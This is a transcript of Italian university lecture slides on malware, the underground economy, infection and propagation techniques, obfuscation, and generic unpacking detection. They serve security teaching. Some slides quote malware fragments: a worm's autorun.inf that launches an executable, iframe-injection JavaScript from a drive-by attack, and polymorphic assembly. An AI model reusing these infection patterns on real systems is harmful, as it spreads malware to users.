Malware e underground economy
|
|
- Valentina Randazzo
- 6 anni fa
- Visualizzazioni
Transcript
1 Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Malware e underground economy Roberto Paleari roberto@security.dico.unimi.it 14 dicembre 2009 R. Paleari Malware e underground economy 14 dicembre / 41
2 Introduzione R. Paleari Malware e underground economy 14 dicembre / 41
3 Malware sequenza di codice progettata per danneggiare intenzionalmente un sistema, i dati che contiene o comunque alterare il suo normale funzionamento, all insaputa dell utente R. Paleari Malware e underground economy 14 dicembre / 41
4 Tipologie di malware replicazione no replicazione replicazione autonoma Virus Rootkit Trojan horse Worm Dialer Spyware Keylogger necessita ospite nessun ospite dipendenza da ospite R. Paleari Malware e underground economy 14 dicembre / 41
5 Tipologie di malware Virus & worm Virus Worm replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità R. Paleari Malware e underground economy 14 dicembre / 41
6 Tipologie di malware Virus & worm Virus replicazione autonoma necessitano di un ospite in cui inserirsi propagazione attraverso la diffusione dell ospite riproduzione Worm non necessitano di un ospite propagazione autonoma attraverso la rete capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità payload infezione R. Paleari Malware e underground economy 14 dicembre / 41
7 Tipologie di malware Trojan horse & backdoor Trojan horse funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware R. Paleari Malware e underground economy 14 dicembre / 41
8 Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) R. Paleari Malware e underground economy 14 dicembre / 41
9 Tipologie di malware Trojan horse & backdoor Trojan horse Backdoor Rootkit funzionalità maligne cammuffate tra altre benigne propagazione manuale: diffusione di applicazioni con funzionalità secondarie o inserimento di nuove funzionalità in applicazioni esistenti rientrano in questa categoria adware e spyware per assicurare l accesso ad un sistema compromesso rientrano in questa categoria i RAT (Remote Access Trojan) strumenti utilizzati per mantenere l accesso ad un sistema compromesso senza fare nascere sospetti utilizzati per nascondere file, processi, connessioni di rete,... sia a livello kernel che a livello utente R. Paleari Malware e underground economy 14 dicembre / 41
10 Nuove minacce Number of new threats Jan-Jun 2008 Jul-Dec 2007 Jan-Jun 2007 Jul-Dec 2008 Jan-Jun 2009 Period Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre / 41
11 Malware & underground economy R. Paleari Malware e underground economy 14 dicembre / 41
12 Phishing R. Paleari Malware e underground economy 14 dicembre / 41
13 Phishing R. Paleari Malware e underground economy 14 dicembre / 41
14 Scam R. Paleari Malware e underground economy 14 dicembre / 41
15 Come funziona? 1 campagna di spam R. Paleari Malware e underground economy 14 dicembre / 41
16 Come funziona? 1 campagna di spam 2 social engineering GET /... R. Paleari Malware e underground economy 14 dicembre / 41
17 Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware R. Paleari Malware e underground economy 14 dicembre / 41
18 Come funziona? 1 campagna di spam 2 social engineering 3 furto credenziali & malware 4 infezione macchine R. Paleari Malware e underground economy 14 dicembre / 41
19 Underground economy Vendita informazioni rubate Goods & services Percentage Range of prices Bank accounts 22% $10-$1000 Credit cards 13% $0.40-$20 Full identities 9% $1-$15 Online auction site accounts 7% $1-$8 Scams 7% $2.50-$50/week (hosting) Mailers 6% $1-$10 addresses 5% $0.83/MB-$10/MB passwords 5% $4-$30 Drop (request or offer) 5% 10%-20% of drop amount Proxies 5% $1.50-$30 Fonte: Symantec R. Paleari Malware e underground economy 14 dicembre / 41
20 Underground economy Furto credenziali Portata del fenomeno Università di Mannheim Limbo & ZeuS 70 dropzone 33 GB di dati account bancari, account mail Dropzone # Machines Data amount Country webpinkxxx.cn 26, GB China coxxx-google.cn 12, GB Malaysia 77.XXX , MB Russia finxxxonline.com 6, MB Estonia Other 108, GB Total 164, GB Fonte: Learning More About the Underground Economy T. Holz, M. Engelberth, F. Freiling, 2008 R. Paleari Malware e underground economy 14 dicembre / 41
21 Underground economy Malware as a service Bot in affitto ( $1000-$2000/mese) MPACK: exploit toolkit a $1000 R. Paleari Malware e underground economy 14 dicembre / 41
22 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... R. Paleari Malware e underground economy 14 dicembre / 41
23 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? R. Paleari Malware e underground economy 14 dicembre / 41
24 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! > 100K captcha al giorno, $1.5-$8 per 1000 captcha R. Paleari Malware e underground economy 14 dicembre / 41
25 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR,... Soluzioni migliori? Human computation! R. Paleari Malware e underground economy 14 dicembre / 41
26 Funzionalità del malware Non solo spam... mass-mailing (Sobig) HTTP/SOCKS proxy (MyDoom) SMTP proxy (Taripox, Happy99) diffusione tramite IM (Peacomm) R. Paleari Malware e underground economy 14 dicembre / 41
27 Funzionalità del malware Furto credenziali Obiettivi credenziali account bancari/posta serial prodotti commerciali (Agobot) harvesting Come? installazione plugin BHO/XUL modifica C:\Windows\...\etc\hosts keylogging screen grabbing R. Paleari Malware e underground economy 14 dicembre / 41
28 Funzionalità del malware Click fraud Google: 10% dei click sono fraudolenti ( $1B) Clickbot.A ( 50k host infetti) molti clickbot commerciali ClickJacking R. Paleari Malware e underground economy 14 dicembre / 41
29 Funzionalità del malware Anti-anti-virus kill processi in esecuzione vari hook per auto-start prima dell AV impedire aggiornamento AV corruzione DB signature kernel-level callback via PsSetLoadImageNotifyRoutine()... R. Paleari Malware e underground economy 14 dicembre / 41
30 Funzionalità del malware Botnet... argomento della prossima lezione R. Paleari Malware e underground economy 14 dicembre / 41
31 Tecniche di infezione File/device infection file infection tecnicamente complesso con PE Virut EPO file infector entry programma infezione programma virus entry R. Paleari Malware e underground economy 14 dicembre / 41
32 Tecniche di infezione File/device infection file infection infezione device removibili Knight: autorun.inf [autorun] open=knight.exe open icon=knight.exe,0 shellexecute=knight.exe open shell=auto action=disk Knight(Protection Against Mobile Disk Viruses) shell\auto=&auto shell\auto\command=knight.exe open shell\open=&open shell\open\command=knight.exe open shell\explore=e&xplore shell\explore\command=knight.exe open shell\find=s&earch... shell\find\command=knight.exe open... R. Paleari Malware e underground economy 14 dicembre / 41
33 Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre / 41
34 Tecniche di infezione File/device infection file infection infezione device removibili root-kit user vs kernel level obiettivo: nascondere processi, file, connessioni di rete,... hooking a diversi livelli (IDT,SSDT,DKOM,... ) Attacking SMM Memory via Intel CPU Cache Poisoning (19/3/2009) EPROCESS csrss.exe EPROCESS malware.exe EPROCESS svchost.exe R. Paleari Malware e underground economy 14 dicembre / 41
35 Tecniche di infezione File/device infection file infection infezione device removibili root-kit R. Paleari Malware e underground economy 14 dicembre / 41
36 Tecniche di infezione File/device infection file infection infezione device removibili root-kit MBR/boot infection Trojan.Mebroot (11/2007) infezione \\.\PhysicalDrive{0-15} ( compresi device USB) root-kit, furto credenziali bancarie This malware is very professionally written and produced (F-Secure) R. Paleari Malware e underground economy 14 dicembre / 41
37 Tecniche di propagazione Propagation mechanisms Percentage File sharing executables 40% File transfer/ attachment 32% File transfer/cifs 28% File sharing/p2p 19% Remotely exploitable vulnerability 17% SQL 3% Back door/kuang2 3% Back door/subseven 3% File transfer/embedded HTTP URI/Yahoo! Messenger 2% Web 1% Fonte: Symantec, 2007 R. Paleari Malware e underground economy 14 dicembre / 41
38 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41
39 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41
40 Tecniche di propagazione Rogue Antivirus R. Paleari Malware e underground economy 14 dicembre / 41
41 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41
42 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41
43 Tecniche di propagazione Remote exploit + drive-by-download Dolphin Stadium link a JS maligno nel sito exploit MS MS download keylogger/backdoor 3 giorni prima del Super Bowl! R. Paleari Malware e underground economy 14 dicembre / 41
44 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari Malware e underground economy 14 dicembre / 41
45 Tecniche di propagazione Remote exploit + drive-by-download parishilton.com <iframe> maligno download binario da you69tube.com information-stealing (variante di Zbot?) exploit PDF (overflow) If you screw around with Paris you might get a virus... Commento su ZDNet R. Paleari Malware e underground economy 14 dicembre / 41
46 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime R. Paleari Malware e underground economy 14 dicembre / 41
47 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre / 41
48 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) R. Paleari Malware e underground economy 14 dicembre / 41
49 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI) h.js document. w r i t e ( <i f r a m e s r c = h t t p : / /... / admin /News/ f a q. htm ></i f r a m e> ) ; document. w r i t e ( <i f r a m e s r c = h t t p : / /... / i. htm ></i f r a m e> ) ; faq.htm <i f r a m e s r c=h t t p : / /... / i. htm width =100 h e i g h t=0></ i f r a m e> <s c r i p t s r c= h t t p : / / count y e s. com/ c l i c k. aspx? i d = & l o g o =11 ></ s c r i p t> i.htm <s c r i p t>... e x p l o i t...</ s c r i p t> <s c r i p t s r c= h t t p : / / count y e s. com/ c l i c k. aspx? i d = & l o g o=1 ></ s c r i p t> R. Paleari Malware e underground economy 14 dicembre / 41
50 Tecniche di propagazione Remote exploit + drive-by-download Un esempio live ricerca sito vulnerabile trend attuale: compromissione di siti famosi molti visitatori molte vittime compromissione sito (SQLI)... aspettare... R. Paleari Malware e underground economy 14 dicembre / 41
51 Soluzioni? R. Paleari Malware e underground economy 14 dicembre / 41
52 Soluzioni? R. Paleari Malware e underground economy 14 dicembre / 41
53 Situazione attuale malware vs AV AV in posizione svantaggiata The amount of new malware has never been higher. Our labs are receiving an average of 25,000 malware samples every day, seven days a week. F-Secure, 2008 R. Paleari Malware e underground economy 14 dicembre / 41
54 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione R. Paleari Malware e underground economy 14 dicembre / 41
55 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione R. Paleari Malware e underground economy 14 dicembre / 41
56 Perchè una cosí grande diffusione? omogeneità, connettività e configurazione scarsa attenzione incentivo economico R. Paleari Malware e underground economy 14 dicembre / 41
57 Situazione malware detector Signature-based detectors Fonte: Testing Malware Detectors M. Christodorescu, S. Jha, 2004 R. Paleari Malware e underground economy 14 dicembre / 41
58 Situazione malware detector... qualche dato più recente Rank Detected Missed Product 1 91% 178 Sophos 2 91% 179 AntiVir 3 90% 194 Microsoft 4 90% 195 AVG 5 90% 202 Ikarus 6 89% 213 BitDefender 7 88% 241 Norman 8 88% 247 TrendMicro 9 87% 259 Kaspersky 10 87% 268 F-Secure Fonte: SRI International + VirusTotal, campione di 2064 malware R. Paleari Malware e underground economy 14 dicembre / 41
59 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime R. Paleari Malware e underground economy 14 dicembre / 41
60 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Malicious code R. Paleari Malware e underground economy 14 dicembre / 41
61 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre / 41
62 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code R. Paleari Malware e underground economy 14 dicembre / 41
63 Tecniche di self-defense Packing codice maligno nascosto da 1 + layer di compressione/cifratura decompressione/decrifratura a runtime Unpacking routine Unpacking routine Malicious code Problema 80% del malware è packed 200 famiglie di packer, 2000 varianti backlog di 90 famiglie Fonte: Symantec, 2008 R. Paleari Malware e underground economy 14 dicembre / 41
64 Tecniche di self-defense Polimorfismo Esempio ancora corpo cifrato il malware è in grado di mutare la routine di cifratura l e a s i, c o r p o v i r u s nop mov sp, 0682 h sub ax, bx c i c l o : xor [ s i ], s i inc cx xor [ s i ], sp i n c s i add bx, cx dec sp j n z c i c l o c o r p o v i r u s :... le istruzioni evidenziate sono junk code possibile anche instruction reordering, instruction substitution, register replacement,... elevato numero di mutazioni possibili difficile individuare una signature costante R. Paleari Malware e underground economy 14 dicembre / 41
65 Tecniche di self-defense Metamorfismo metamorphics are body-polymorphics (Igor Muttik) W95/Regswap 5A pop edx BF mov edi, 0004 h 8BF5 mov e s i, ebp B80C mov eax, Ch 81C add edx, 0088 h 8B1A mov ebx, [ edx ] 58 pop eax BB mov ebx, 0004 h 8BD5 mov edx, ebp BF0C mov edi, Ch 81C add eax, 0088 h 8B30 mov e s i, [ eax ] W32/Evol BF0F mov edi, Fh 893E mov [ e s i ], e d i 5F pop e d i 52 push edx B640 mov dh, 4 0 BA8BEC5151 mov edx, EC8Bh 53 push ebx 8BDA mov ebx, edx 895 E04 mov [ e s i +0004], ebx BB0F mov ebx, Fh 891E mov [ e s i ], ebx 5B pop ebx 51 push ecx B9CB00C05F mov ecx, 5 FC000CBh 81C1C0EB91F1 add ecx, F191EBC0h 894 E04 mov [ e s i +0004], ecx R. Paleari Malware e underground economy 14 dicembre / 41
66 Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre / 41
67 Tecniche di self-defense Implementazione difficile? R. Paleari Malware e underground economy 14 dicembre / 41
68 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malicious program Malware detector R. Paleari Malware e underground economy 14 dicembre / 41
69 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???? R. Paleari Malware e underground economy 14 dicembre / 41
70 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? R. Paleari Malware e underground economy 14 dicembre / 41
71 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious R. Paleari Malware e underground economy 14 dicembre / 41
72 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program???????? Malicious Problemi ogni packer richiede un unpacker specifico troppe famiglie di packer Symantec: da 6 ore a 6 mesi per packer multi-layer packing R. Paleari Malware e underground economy 14 dicembre / 41
73 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking R. Paleari Malware e underground economy 14 dicembre / 41
74 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41
75 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41
76 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41
77 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Packed code R. Paleari Malware e underground economy 14 dicembre / 41
78 Next-generation malware detector Unpacking generico Idea analisi dinamica emulazione/tracing dell esecuzione fino al termine della routine di unpacking Unpacked Packed code Un po di nomi... OmniUnpack Justin Renovo PolyUnpack R. Paleari Malware e underground economy 14 dicembre / 41
79 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX R. Paleari Malware e underground economy 14 dicembre / 41
80 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 0 R. Paleari Malware e underground economy 14 dicembre / 41
81 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Scrittura pagina 2 W = W {2} R. Paleari Malware e underground economy 14 dicembre / 41
82 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 0 = NtOpenFile Page Access # W WX Esecuzione system call s 0 (non pericolosa e WX = ) R. Paleari Malware e underground economy 14 dicembre / 41
83 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Scrittura pagina 1 W = W {1} R. Paleari Malware e underground economy 14 dicembre / 41
84 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 1 WX = WX {1} (pagine written-then-executed) R. Paleari Malware e underground economy 14 dicembre / 41
85 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 1 = NtOpenKey Page Access # W WX Esecuzione system call s 1 (non pericolosa) R. Paleari Malware e underground economy 14 dicembre / 41
86 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Esecuzione pagina 2 WX = WX {1} R. Paleari Malware e underground economy 14 dicembre / 41
87 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... s 2 = NtDeleteFile Page Access # W WX Esecuzione system call s 2 (pericolosa) Viene invocato il malware detector per analizzare le pagine in W R. Paleari Malware e underground economy 14 dicembre / 41
88 Next-generation malware detector Unpacking generico: OmniUnpack Execution trace x(0), w(2), s 0, w(1), x(1), s 1, x(2), s 2,... Page Access # W WX Se il programma non è maligno, W e WX diventano e l esecuzione riprende R. Paleari Malware e underground economy 14 dicembre / 41
89 Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche R. Paleari Malware e underground economy 14 dicembre / 41
90 Next-generation malware detector Analisi comportamentale signature-based detection è troppo debole verso tecniche più semantiche Soluzioni analisi dinamica granularità a livello di system call NovaShield, ThreatFire, Sana Security,... Problemi performance falsi positivi information leakage... R. Paleari Malware e underground economy 14 dicembre / 41
91 Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre / 41
92 Remediation detection non è sempre possibile remediation dell infezione... ma funziona? R. Paleari Malware e underground economy 14 dicembre / 41
Modulo informatica di base 1 Linea 2. Lezione XIII: Sicurezza informatica. Cos è la sicurezza informatica. C è davvero bisogno di parlarne?
Modulo di 1 Linea 2 Mattia Lezione XIII: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2010 M.. Creative Commons Attribuzione-Condividi
DettagliMalware & Underground Economy
Malware & Underground Economy Aristide Fattori joystick@security.dico.unimi.it Università degli Studi di Milano Introduzione A. Fattori Malware & Underground Economy 2 Malware Sequenza di codice progettata
DettagliSicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Sicurezza delle reti.
1 Mattia Lezione XVII: La diffusione delle botnet Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi
DettagliSicurezza dei Calcolatori e delle Reti: Malware
Sicurezza dei Calcolatori e delle Reti: Malware Aristide Fattori joystick@security.di.unimi.it Università degli Studi di Milano Facoltà di Scienze e Tecnologie Anno Accademico 2012/13 23 Aprile 2013 Introduzione
DettagliSicurezza delle reti. Monga. Malware underground economy. Fast-flux service network. Risultati sperimentali. Phishing. Sicurezza delle reti.
1 Mattia Lezione XIII: La diffusione del malware Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2012/13 1 cba 2011 13 M.. Creative Commons Attribuzione-Condividi
DettagliSicurezza delle reti. Monga. Zero Day. polimorfismo. degli attacchi Tecniche di. Generatori di signature Hamsa. Malware underground economy
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Lezione XIII: IDS e attacchi imprevisti a.a. 2014/15 1 cba 2011 15 M.. Creative
DettagliMalware. Roberto Paleari, Alessandro Rinaldi
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 21 Novembre 2007 sequenza di codice progettata per danneggiare intenzionalmente un sistema,
DettagliMalware. Roberto Paleari, Emanuele Passerini
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2008/2009 19 Novembre 2008 sequenza di codice progettata per danneggiare intenzionalmente un sistema,
DettagliUniversità degli Studi di Milano. Malware. Aristide Fattori joystick@security.dico.unimi.it
Università degli Studi di Milano Malware Aristide Fattori joystick@security.dico.unimi.it Introduzione Malware Sequenza di codice progettata per danneggiare intenzionalmente un sistema, i dati che contiene
DettagliNext generation malware
Università degli Studi di Milano Facoltà di Scienze e Tecnologie Dipartimento di Informatica Next generation malware Srdjan Matic Aristide Fattori
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2008/2009. Malware
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2008/2009 Malware Roberto Paleari, Emanuele Passerini 14 Gennaio 2009 Roberto Paleari, Emanuele Passerini
DettagliMalware 2.0. Alessandro Rozza <rozza@dico.unimi.it> Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali
Malware 2.0 Alessandro Rozza Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Progetto della sicurezza di rete 17 Dicembre 2007 Sommario 1 2 3 Sommario
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali. Malware. Roberto Paleari <roberto@security.dico.unimi.
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Malware Roberto Paleari 17-22 Gennaio 2008 Roberto Paleari Malware 17-22 Gennaio 2008
DettagliEvoluzione del malware
Evoluzione del malware Lorenzo Martignoni lorenzo.martignoni@uniud.it Roberto Paleari roberto@security.dico.unimi.it Università degli Studi di Udine Università degli Studi di Milano Malware Sequenza di
DettagliNell oscuro mondo dei Malware
2016 Nell oscuro mondo dei Malware Linux Day 2016 Giuseppe Augiero 22 ottobre 2016 - Linux Day 2016 - Facoltà di Ingegneria - Università di Pisa Malware 3 Di cosa parliamo? Malware Sequenza di codice progettata
DettagliSeqrite Antivirus per Server
Scansioni Antivirus Ottimizzate Leggero Tecnologicamente avanzato Panoramica Prodotto Installazione semplice, scansione antivirus ottimizzata, utilizzo minimo di risorse. Garantisce tempi di trasferimento
DettagliLa sicurezza Malware Seconda parte. Giselda De Vita
La sicurezza Malware Seconda parte Giselda De Vita - 2015 1 Malware è l abbreviazione di malicious software Giselda De Vita - 2015 2 Il malware è un programma Il malware è un software scritto da un programmatore.
DettagliSicurezza delle reti. Monga. Fast-flux service network. Risultati sperimentali. L autenticazione. Botnet. Sicurezza delle reti. Monga.
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Lezione XIV: Fast-Flux a.a. 2014/15 1 cba 2011 15 M.. Creative Commons Attribuzione
DettagliMALWARE. 3/04/2010 Giuseppe Tamanini 1 di 22
Si definisce malware un qualsiasi software creato con il solo scopo di causare danni più o meno gravi al computer su cui viene eseguito. Il termine deriva dalle parole inglesi malicious e software e significa
DettagliModulo informatica di base 1 Linea 2
Modulo informatica di 1 Linea 2 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2010 M.. Creative Commons Attribuzione-Condividi
DettagliANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA. Tesina di Matteo Neri A.S. 2008-2009
ANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA Tesina di Matteo Neri A.S. 2008-2009 Sommario - Introduzione - Analisi di malware - Soluzioni di difesa - Previsioni sul futuro del malware Prima Parte Introduzione
DettagliBOTNET: Il caso ZeuS. Theory and Practices from the Scene
BOTNET: Il caso ZeuS Theory and Practices from the Scene I Malware Si definisce malware un qualsiasi software creato con il solo scopo di causare danni più o meno gravi al computer su cui viene eseguito.
DettagliCome affrontare le nuove minacce della Cybersecurity in Italia: Ransomware e Attacchi mirati. Fabio Sammartino Presales Manager Kaspersky Lab
Come affrontare le nuove minacce della Cybersecurity in Italia: Ransomware e Attacchi mirati Fabio Sammartino Presales Manager Kaspersky Lab 20 ANNI DI LOTTA AL CYBERCRIME 1/3 dei dipendenti dell'azienda
DettagliINTERNET Ing. Giovanni Pozzi
U.T.E. Università della Terza Età Bollate, Garbagnate Milanese e Novate Milanese INTERNET Ing. Giovanni Pozzi Sicurezza Malware Nella sicurezza informatica il termine malware indica genericamente un qualsiasi
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali. Internet. Roberto Paleari <roberto@security.dico.unimi.
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Internet Roberto Paleari 14 Maggio 2009 Roberto Paleari Internet 14 Maggio 2009 1 /
DettagliTipologie e metodi di attacco
Tipologie e metodi di attacco Tipologie di attacco Acquisizione di informazioni L obiettivo è quello di acquisire informazioni, attraverso l intercettazione di comunicazioni riservate o ottenendole in
DettagliG Data Antivirus 2015
G Data Antivirus 2015 PROTEZIONE DI BASE DA VIRUS E ALTRI MALWARE DIGITALI Da oltre 25 anni G DATA si impegna nella ricerca per la tua sicurezza. Il risultato: protezione immediata e completa per il tuo
DettagliBanking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director
Banking Cybercrime: Attacchi e scenari di banking malware in Italia Giorgio Fedon Owasp Italy Technical Director IEEE-DEST 2012 giorgio.fedon@owasp.org Copyright The OWASP Foundation Permission is granted
DettagliInformazioni sul Global Internet Security Threat Report di Symantec
Informazioni sul Global Internet Security Threat Report di Symantec Il Global Internet Security Threat Report di Symantec fornisce una panoramica e un analisi delle attività delle minacce di Internet a
DettagliEUROPEAN COMPUTER DRIVING LICENCE: IT SECURITY SPECIALISED LEVEL. Malware
Malware 76 1 Malware Il termine malware indica un software creato con lo scopo di causare danni più o meno gravi a un sistema informatico su cui viene eseguito e ai dati degli utenti. Il termine deriva
DettagliSMAU 2009. Malicious Softwares: Conosciamoli meglio
SMAU 2009 Malicious Softwares: Conosciamoli meglio Chi sono? Graziano `emdel` Mariano Ho conseguito ad Ottobre la laurea triennale in Ingegneria delle Telecomunicazioni presso il Politecnico di Torino
DettagliSommario Prefazione... xiii Diventa esperto in sicurezza... xiii Capitolo 1... 1 Codici nocivi... 1
Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii A chi è rivolto questo libro... xiii Una verità scomoda... xiv Il punto della situazione... xv Gli hacker e l hacking... xvii Distinzione
DettagliResearch Challenges in Computer Security Dipartimento di Informatica Università di Verona
Research Challenges in Computer Security Dipartimento di Informatica Università di Verona GRUPPO DI RICERCA Sicurezza dei Computer Roberto Giacobazzi Isabella Mastroeni Mila Dalla Preda Alessandro Farinelli:
DettagliINTERNET Ing. Giovanni Pozzi
U.T.E. Università della Terza Età Bollate, Garbagnate Milanese e Novate Milanese INTERNET Ing. Giovanni Pozzi Sicurezza Malware Nella sicurezza informatica il termine malware indica genericamente un qualsiasi
DettagliIntroduzione Virus Worm Anti-virus Bibliografia. Malware. Roberto Paleari <roberto@security.dico.unimi.it>
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali CFP Vigorelli 1-6 febbraio 2006 Sommario 1 2 3 4 5 Sommario 1 2 3 4 5 Sommario 1 2 3
DettagliAttacchi alle infrastrutture virtuali
Come proteggere le informazioni e difendersi nei nuovi ambienti tecnologici beneficiando al massimo dei vantaggi Alessio L.R. Pennasilico - apennasilico@clusit.it Gastone Nencini - gastone_nencini@trendmicro.it
DettagliINDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8
Introduzione e scopo del documento INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO SICUREZZA... 8 1.1 INTRODUZIONE... 9 1.1.1 MOTIVAZIONI: PERCHÉ SERVE LA SICUREZZA... 9 1.1.2 CONFIDENZIALITÀ,
DettagliMobile Insecurity. Manno, 28 Settembre 2011 D Amato Luigi
